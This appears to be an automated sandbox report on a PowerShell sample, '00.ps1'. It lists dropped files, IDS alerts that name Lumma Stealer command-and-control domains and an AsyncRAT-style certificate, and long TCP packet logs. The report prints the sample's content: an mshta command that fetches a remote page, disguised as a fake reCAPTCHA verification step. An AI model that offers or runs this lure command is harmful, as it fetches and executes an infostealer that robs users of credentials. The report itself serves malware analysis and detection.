                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scsn2c0s.idp.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ung4hkox.2nv.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vt23wiyi.obh.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vv0xvetf.m3y.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6222
                                                                                                                                                      Entropy (8bit):3.7483951001001263
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:zYN/CBGKCkvhkvCCtJONKBW4HHHNKBW9HH4:zYtr2Ks+KsO
                                                                                                                                                      MD5:799AB15158A0FBA9C5205C25F04C4D2A
                                                                                                                                                      SHA1:A4FEF04D18EA894946F4134650361B86E7FEA4A6
                                                                                                                                                      SHA-256:488D9445E5183F61C173CBE4564A9892D15332ED9EB862F42813F9CBE09F06FA
                                                                                                                                                      SHA-512:D66EEAC308F99C8D4F19FE948BB9BC01FE86780E67EAC937D543FE78E4FE37D5536D0C602D2DE963151A68C09A548A60FBDADA34F6E5A397AE0D98B24B04583C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...................................FL..................F.".. ...;.}.S......s.g..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......l.g..?..s.g......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S./ZGJ....B......................A!.A.p.p.D.a.t.a...B.V.1...../ZLJ..Roaming.@......"S./ZLJ....D.....................#Hw.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S./ZGJ....E.......................(.M.i.c.r.o.s.o.f.t.....V.1...../ZE...Windows.@......"S./ZGJ....F.....................}.#.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`/ZF.....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`/ZF.....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S./Z;.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S./ZRJ....i...........

                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P5S1XK8Y7F5KR1YLF42F.temp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6222
                                                                                                                                                      Entropy (8bit):3.7483951001001263
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:zYN/CBGKCkvhkvCCtJONKBW4HHHNKBW9HH4:zYtr2Ks+KsO
                                                                                                                                                      MD5:799AB15158A0FBA9C5205C25F04C4D2A
                                                                                                                                                      SHA1:A4FEF04D18EA894946F4134650361B86E7FEA4A6
                                                                                                                                                      SHA-256:488D9445E5183F61C173CBE4564A9892D15332ED9EB862F42813F9CBE09F06FA
                                                                                                                                                      SHA-512:D66EEAC308F99C8D4F19FE948BB9BC01FE86780E67EAC937D543FE78E4FE37D5536D0C602D2DE963151A68C09A548A60FBDADA34F6E5A397AE0D98B24B04583C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...................................FL..................F.".. ...;.}.S......s.g..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......l.g..?..s.g......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S./ZGJ....B......................A!.A.p.p.D.a.t.a...B.V.1...../ZLJ..Roaming.@......"S./ZLJ....D.....................#Hw.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S./ZGJ....E.......................(.M.i.c.r.o.s.o.f.t.....V.1...../ZE...Windows.@......"S./ZGJ....F.....................}.#.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`/ZF.....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`/ZF.....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S./Z;.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S./ZRJ....i...........

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Unicode text, UTF-8 text, with no line terminators
                                                                                                                                                      Entropy (8bit):4.842251469033845
                                                                                                                                                      TrID:
                                                                                                                                                        File name:00.ps1
                                                                                                                                                        File size:113 bytes
                                                                                                                                                        MD5:8067bbe2706cbd02f6885c17c186e6cd
                                                                                                                                                        SHA1:2d8e307684b8b5f8a8a68d5892db6879eaa69b25
                                                                                                                                                        SHA256:44be296b2cbb2b21f81aa170020314425962a7e935678fbab1f4845e953aeecb
                                                                                                                                                        SHA512:e524709437749c9a6f6d35b256712f56fa90892dbc26bacaebb85985341cefeb55539661be2fa4a6a25683128962b7b0b19b6a740fe9631ee12d8cc7f09951c5
                                                                                                                                                        SSDEEP:3:rN6eX7XsFMXWIWjDXbgG+RbqRF4I1yMQRWLBCn:Z6eXQaPq3gTIMPyBCn
                                                                                                                                                        TLSH:50B022B20C0020222F23002C02002B88033C8288A0F00023222200300033CB0C323008
                                                                                                                                                        File Content Preview:mshta https://view-reserve.com/recaptcha-verify.html # ... ''I am not a robot - reCAPTCHA Verification ID: 7848''

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:3270d6baae77db44

                                                                                                                                                        Network Behavior

                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2025-01-15T10:18:40.609977+01002059221ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat)1192.168.11.20642361.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:40.713938+01002059189ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)1192.168.11.20501471.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:40.821663+01002059211ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)1192.168.11.20492191.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:40.927416+01002059201ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)1192.168.11.20537991.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:41.034271+01002059203ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)1192.168.11.20627571.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:41.140323+01002059199ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)1192.168.11.20508411.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:41.243846+01002059207ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)1192.168.11.20590501.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:41.349146+01002059209ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)1192.168.11.20636161.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:41.453265+01002059191ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)1192.168.11.20505051.1.1.153UDP
                                                                                                                                                        2025-01-15T10:18:41.878148+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204977323.47.27.74443TCP
                                                                                                                                                        2025-01-15T10:18:42.232242+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.11.204977323.47.27.74443TCP
                                                                                                                                                        2025-01-15T10:18:46.835545+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert192.255.57.11256001192.168.11.2049774TCP

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 15, 2025 10:18:36.060226917 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:36.060256958 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:36.060652018 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:36.079901934 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:36.079916000 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:36.814987898 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:36.815205097 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:36.846652985 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:36.846698046 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:36.846925974 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:36.847114086 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:36.848464012 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:36.890310049 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.337528944 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.337544918 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.337657928 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.337672949 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.337687016 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.337793112 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.337805033 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.337908030 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.338047981 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.338814020 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.338876009 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.339004040 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.339091063 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.339191914 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.339720964 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.339720964 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:37.339735985 CET4434976992.255.57.120192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:37.340002060 CET49769443192.168.11.2092.255.57.120
                                                                                                                                                        Jan 15, 2025 10:18:38.309593916 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.397594929 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.414387941 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.534847975 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.535145044 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.535353899 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.613953114 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.614690065 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.614690065 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.647859097 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.648091078 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.648339033 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.760771036 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.760791063 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.760967970 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.761023045 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.761105061 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.761184931 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.761354923 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.761372089 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.761393070 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.761523008 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.761600018 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.761694908 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.761694908 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.761713028 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.762037992 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.832935095 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833007097 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833159924 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833265066 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.833287001 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833339930 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833498955 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.833508015 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833599091 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833684921 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833686113 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.833821058 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.833837986 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.833921909 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.834136963 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.883505106 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.883801937 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.883821964 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.883970976 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.884105921 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.884160042 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.884313107 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.884433031 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.884550095 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.884617090 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.885248899 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.885430098 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.986166000 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.986187935 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.986345053 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.986536026 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.986567020 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.986644983 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.986774921 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.986884117 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.986901999 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.986989975 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.987076044 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.987111092 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.987221003 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.987242937 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.987306118 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.987417936 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.987534046 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.987580061 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.987580061 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.987653017 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.987816095 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.987930059 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.988049030 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.988085032 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.988162994 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.988254070 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.988300085 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.988342047 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:38.988421917 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:38.988591909 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.049678087 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.049789906 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.049839973 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.049982071 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.050059080 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.050108910 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.050260067 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.050370932 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.050483942 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.050595045 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.050708055 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.050828934 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.050987005 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.051060915 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.051119089 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.051119089 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.051119089 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.051119089 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.051172018 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.051214933 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.051274061 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.051343918 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.051434040 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.051532030 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.051640034 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.051704884 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.051752090 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.051865101 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.052881002 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.052881002 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.118865967 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.118952990 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119077921 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119261980 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.119273901 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119386911 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119513035 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119585991 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119594097 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.119693041 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119760990 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.119821072 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119920969 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.119925976 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.120040894 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.120076895 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.120155096 CET804977292.255.57.112192.168.11.20
